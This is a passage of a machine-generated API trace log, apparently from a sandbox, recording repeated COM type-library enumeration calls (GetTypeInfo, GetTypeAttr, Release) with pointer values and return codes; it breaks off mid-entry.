ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd118) returned 0x0 [0030.780] IUnknown:Release (This=0x780b2e8) returned 0x2 [0030.780] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd118, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.780] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd118) returned 0x0 [0030.780] IUnknown:Release (This=0xb4cd118) returned 0x1 [0030.780] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd170) returned 0x0 [0030.781] IUnknown:Release (This=0x780b468) returned 0x2 [0030.781] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd170, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.781] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd170) returned 0x0 [0030.781] IUnknown:Release (This=0xb4cd170) returned 0x1 [0030.781] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd1c8) returned 0x0 [0030.781] IUnknown:Release (This=0x780b4c8) returned 0x2 [0030.781] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd1c8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.781] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccfb8, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.781] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccfb8) returned 0x0 [0030.781] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd118, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.781] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd118) returned 0x0 [0030.781] IUnknown:Release (This=0xb4ccfb8) returned 0x1 [0030.781] IUnknown:Release (This=0xb4cd118) returned 0x1 [0030.781] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd1c8) returned 0x0 [0030.781] IUnknown:Release (This=0xb4cd1c8) returned 0x1 [0030.781] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd220) returned 0x0 [0030.781] IUnknown:Release (This=0x780b528) returned 0x2 [0030.781] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd220, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.782] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccf08, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.782] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccf08) returned 0x0 [0030.782] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd170, ppTypeAttr=0x2e6a00, pDummy=0x6 | out: ppTypeAttr=0x2e6a00, pDummy=0x6) returned 0x0 [0030.782] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd170) returned 0x0 [0030.782] IUnknown:Release (This=0xb4ccf08) returned 0x1 [0030.782] IUnknown:Release (This=0xb4cd170) returned 0x1 [0030.782] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd220) returned 0x0 [0030.782] IUnknown:Release (This=0xb4cd220) returned 0x1 [0030.782] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x30, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd278) returned 0x0 [0030.782] IUnknown:Release (This=0x780b588) returned 0x2 [0030.782] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd278, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.782] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd278) returned 0x0 [0030.782] IUnknown:Release (This=0xb4cd278) returned 0x1 [0030.782] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x31, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd2d0) returned 0x0 [0030.782] IUnknown:Release (This=0x780b5e8) returned 0x2 [0030.782] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd2d0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.782] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd2d0) returned 0x0 [0030.782] IUnknown:Release (This=0xb4cd2d0) returned 0x1 [0030.782] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x32, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd328) returned 0x0 [0030.783] IUnknown:Release (This=0x780b648) returned 0x2 [0030.783] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd328, ppTypeAttr=0x2e6a20, pDummy=0x2016e0004 | out: ppTypeAttr=0x2e6a20, pDummy=0x2016e0004) returned 0x0 [0030.783] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd328) returned 0x0 [0030.783] IUnknown:Release (This=0xb4cd328) returned 0x1 [0030.783] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x33, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd380) returned 0x0 [0030.783] IUnknown:Release (This=0x780b6a8) returned 0x2 [0030.783] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd380, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.783] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd380) returned 0x0 [0030.783] IUnknown:Release (This=0xb4cd380) returned 0x1 [0030.783] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x34, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd3d8) returned 0x0 [0030.783] IUnknown:Release (This=0x780b708) returned 0x2 [0030.783] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd3d8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.783] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd3d8) returned 0x0 [0030.783] IUnknown:Release (This=0xb4cd3d8) returned 0x1 [0030.783] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x35, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd430) returned 0x0 [0030.783] IUnknown:Release (This=0x780b768) returned 0x2 [0030.783] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd430, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.783] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd430) returned 0x0 [0030.783] IUnknown:Release (This=0xb4cd430) returned 0x1 [0030.783] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x36, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd488) returned 0x0 [0030.784] IUnknown:Release (This=0x780b7c8) returned 0x2 [0030.784] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd488, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.784] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd488) returned 0x0 [0030.784] IUnknown:Release (This=0xb4cd488) returned 0x1 [0030.784] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x37, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd4e0) returned 0x0 [0030.784] IUnknown:Release (This=0x780b828) returned 0x2 [0030.784] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd4e0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.784] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd4e0) returned 0x0 [0030.784] IUnknown:Release (This=0xb4cd4e0) returned 0x1 [0030.784] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x38, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd538) returned 0x0 [0030.784] IUnknown:Release (This=0x780b888) returned 0x2 [0030.784] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd538, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.784] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd538) returned 0x0 [0030.784] IUnknown:Release (This=0xb4cd538) returned 0x1 [0030.784] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x39, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd590) returned 0x0 [0030.784] IUnknown:Release (This=0x780b8e8) returned 0x2 [0030.784] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd590, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.785] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd590) returned 0x0 [0030.785] IUnknown:Release (This=0xb4cd590) returned 0x1 [0030.785] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd5e8) returned 0x0 [0030.785] IUnknown:Release (This=0x780b948) returned 0x2 [0030.785] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd5e8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.785] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd5e8) returned 0x0 [0030.785] IUnknown:Release (This=0xb4cd5e8) returned 0x1 [0030.785] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd640) returned 0x0 [0030.785] IUnknown:Release (This=0x780b9a8) returned 0x2 [0030.785] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd640, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.785] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd640) returned 0x0 [0030.785] IUnknown:Release (This=0xb4cd640) returned 0x1 [0030.785] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd698) returned 0x0 [0030.785] IUnknown:Release (This=0x780ba08) returned 0x2 [0030.785] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd698, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.785] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd698) returned 0x0 [0030.785] IUnknown:Release (This=0xb4cd698) returned 0x1 [0030.785] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd6f0) returned 0x0 [0030.785] IUnknown:Release (This=0x780ba68) returned 0x2 [0030.785] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd6f0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.785] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd6f0) returned 0x0 [0030.786] IUnknown:Release (This=0xb4cd6f0) returned 0x1 [0030.786] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd748) returned 0x0 [0030.786] IUnknown:Release (This=0x780bac8) returned 0x2 [0030.786] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd748, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.786] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd748) returned 0x0 [0030.786] IUnknown:Release (This=0xb4cd748) returned 0x1 [0030.786] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd7a0) returned 0x0 [0030.786] IUnknown:Release (This=0x780bb28) returned 0x2 [0030.786] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd7a0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.786] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd7a0) returned 0x0 [0030.786] IUnknown:Release (This=0xb4cd7a0) returned 0x1 [0030.786] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x40, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd7f8) returned 0x0 [0030.786] IUnknown:Release (This=0x780bb88) returned 0x2 [0030.786] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd7f8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.786] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd7f8) returned 0x0 [0030.786] IUnknown:Release (This=0xb4cd7f8) returned 0x1 [0030.786] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x41, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd850) returned 0x0 [0030.786] IUnknown:Release (This=0x780bbe8) returned 0x2 [0030.786] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd850, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.786] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd850) returned 0x0 [0030.786] IUnknown:Release (This=0xb4cd850) returned 0x1 [0030.787] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x42, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd900) returned 0x0 [0030.787] IUnknown:Release (This=0x780bc48) returned 0x2 [0030.787] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd900, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.787] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd900) returned 0x0 [0030.787] IUnknown:Release (This=0xb4cd900) returned 0x1 [0030.787] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x43, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd9b0) returned 0x0 [0030.787] IUnknown:Release (This=0x780bca8) returned 0x2 [0030.787] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd9b0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.787] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd9b0) returned 0x0 [0030.787] IUnknown:Release (This=0xb4cd9b0) returned 0x1 [0030.787] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x44, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cda08) returned 0x0 [0030.787] IUnknown:Release (This=0x780bd08) returned 0x2 [0030.787] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cda08, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.787] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cda08) returned 0x0 [0030.787] IUnknown:Release (This=0xb4cda08) returned 0x1 [0030.787] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x45, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cdab8) returned 0x0 [0030.787] IUnknown:Release (This=0x780bd68) returned 0x2 [0030.788] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdab8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.788] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdab8) returned 0x0 [0030.788] IUnknown:Release (This=0xb4cdab8) returned 0x1 [0030.788] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x46, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cdb68) returned 0x0 [0030.788] IUnknown:Release (This=0x780bdc8) returned 0x2 [0030.788] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdb68, ppTypeAttr=0x2e6a20, pDummy=0x32004601050005 | out: ppTypeAttr=0x2e6a20, pDummy=0x32004601050005) returned 0x0 [0030.788] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdb68) returned 0x0 [0030.788] IUnknown:Release (This=0xb4cdb68) returned 0x1 [0030.788] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x47, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cdc18) returned 0x0 [0030.788] IUnknown:Release (This=0x780be28) returned 0x2 [0030.788] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdc18, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.788] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdc18) returned 0x0 [0030.788] IUnknown:Release (This=0xb4cdc18) returned 0x1 [0030.788] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x48, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cdcc8) returned 0x0 [0030.788] IUnknown:Release (This=0x780be88) returned 0x2 [0030.788] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdcc8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.788] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdcc8) returned 0x0 [0030.788] IUnknown:Release (This=0xb4cdcc8) returned 0x1 [0030.788] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x49, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cdd78) returned 0x0 [0030.789] IUnknown:Release (This=0x780bee8) returned 0x2 [0030.789] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdd78, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.789] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdd78) returned 0x0 [0030.789] IUnknown:Release (This=0xb4cdd78) returned 0x1 [0030.789] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cde28) returned 0x0 [0030.789] IUnknown:Release (This=0x780bf48) returned 0x2 [0030.789] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cde28, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.789] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cde28) returned 0x0 [0030.789] IUnknown:Release (This=0xb4cde28) returned 0x1 [0030.789] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cded8) returned 0x0 [0030.789] IUnknown:Release (This=0x780bfa8) returned 0x2 [0030.789] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cded8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.789] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cded8) returned 0x0 [0030.789] IUnknown:Release (This=0xb4cded8) returned 0x1 [0030.789] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cdf88) returned 0x0 [0030.789] IUnknown:Release (This=0x780c008) returned 0x2 [0030.789] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cdf88, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.789] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cdf88) returned 0x0 [0030.789] IUnknown:Release (This=0xb4cdf88) returned 0x1 [0030.789] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce038) returned 0x0 [0030.789] IUnknown:Release (This=0x780c068) returned 0x2 [0030.790] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce038, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.790] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce038) returned 0x0 [0030.790] IUnknown:Release (This=0xb4ce038) returned 0x1 [0030.790] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce0e8) returned 0x0 [0030.790] IUnknown:Release (This=0x780c0c8) returned 0x2 [0030.790] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce0e8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.790] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce0e8) returned 0x0 [0030.790] IUnknown:Release (This=0xb4ce0e8) returned 0x1 [0030.790] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce198) returned 0x0 [0030.790] IUnknown:Release (This=0x780c128) returned 0x2 [0030.790] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce198, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.790] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce198) returned 0x0 [0030.790] IUnknown:Release (This=0xb4ce198) returned 0x1 [0030.790] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x50, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce248) returned 0x0 [0030.790] IUnknown:Release (This=0x780c188) returned 0x2 [0030.790] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce248, ppTypeAttr=0x2e6a20, pDummy=0x4014a000f | out: ppTypeAttr=0x2e6a20, pDummy=0x4014a000f) returned 0x0 [0030.790] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce248) returned 0x0 [0030.790] IUnknown:Release (This=0xb4ce248) returned 0x1 [0030.790] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x51, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce2f8) returned 0x0 [0030.791] IUnknown:Release (This=0x780c1e8) returned 0x2 [0030.791] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce2f8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.791] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce2f8) returned 0x0 [0030.791] IUnknown:Release (This=0xb4ce2f8) returned 0x1 [0030.791] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x52, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce3a8) returned 0x0 [0030.791] IUnknown:Release (This=0x780c248) returned 0x2 [0030.791] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce3a8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.791] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce3a8) returned 0x0 [0030.791] IUnknown:Release (This=0xb4ce3a8) returned 0x1 [0030.791] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x53, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce458) returned 0x0 [0030.792] IUnknown:Release (This=0x780c2a8) returned 0x2 [0030.792] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce458, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.792] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce458) returned 0x0 [0030.792] IUnknown:Release (This=0xb4ce458) returned 0x1 [0030.792] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x54, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce508) returned 0x0 [0030.792] IUnknown:Release (This=0x780c308) returned 0x2 [0030.792] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce508, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.792] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce508) returned 0x0 [0030.792] IUnknown:Release (This=0xb4ce508) returned 0x1 [0030.792] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x55, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce5b8) returned 0x0 [0030.792] IUnknown:Release (This=0x780c368) returned 0x2 [0030.792] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce5b8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.792] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce5b8) returned 0x0 [0030.792] IUnknown:Release (This=0xb4ce5b8) returned 0x1 [0030.792] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x56, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce668) returned 0x0 [0030.792] IUnknown:Release (This=0x780c3c8) returned 0x2 [0030.792] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce668, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.792] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce668) returned 0x0 [0030.792] IUnknown:Release (This=0xb4ce668) returned 0x1 [0030.792] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x57, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce718) returned 0x0 [0030.792] IUnknown:Release (This=0x780c428) returned 0x2 [0030.792] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce718, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.792] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce718) returned 0x0 [0030.793] IUnknown:Release (This=0xb4ce718) returned 0x1 [0030.793] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x58, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce7c8) returned 0x0 [0030.793] IUnknown:Release (This=0x780c488) returned 0x2 [0030.793] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce7c8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.793] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce7c8) returned 0x0 [0030.793] IUnknown:Release (This=0xb4ce7c8) returned 0x1 [0030.793] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x59, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce878) returned 0x0 [0030.793] IUnknown:Release (This=0x780c4e8) returned 0x2 [0030.793] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce878, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.793] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce878) returned 0x0 [0030.793] IUnknown:Release (This=0xb4ce878) returned 0x1 [0030.793] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce928) returned 0x0 [0030.793] IUnknown:Release (This=0x780c548) returned 0x2 [0030.793] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce928, ppTypeAttr=0x2e6a20, pDummy=0x29 | out: ppTypeAttr=0x2e6a20, pDummy=0x29) returned 0x0 [0030.793] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ce928) returned 0x0 [0030.793] IUnknown:Release (This=0xb4ce928) returned 0x1 [0030.793] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce980) returned 0x0 [0030.793] IUnknown:Release (This=0x780c5a8) returned 0x2 [0030.793] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ce980, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: 